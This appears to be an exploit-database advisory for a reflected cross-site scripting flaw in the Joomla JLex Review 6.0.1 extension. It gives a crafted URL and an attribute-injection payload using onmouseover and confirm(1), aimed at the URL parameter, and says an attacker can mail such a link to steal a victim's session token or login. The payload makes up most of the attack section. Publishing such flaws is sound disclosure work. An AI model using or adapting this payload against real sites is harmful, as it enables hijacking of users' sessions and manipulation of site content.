Joomla JLex Review 6.0.1 Cross Site Scripting

2023.08.01

Credit: CraCkEr

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: Joomla JLex Review 6.0.1 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 01/08/2023
# Vendor: JLexArt
# Vendor Homepage: https://jlexart.com/
# Software Link: https://extensions.joomla.org/extension/jlex-review/
# Demo: https://jlexreview.jlexart.com/
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /
URL parameter is vulnerable to XSS
https://website/?review_id=5&itwed"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"b7yzn=1
XSS Payloads:
itwed"onmouseover="confirm(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"b7yzn
[-] Done

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla JLex Review 6.0.1 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.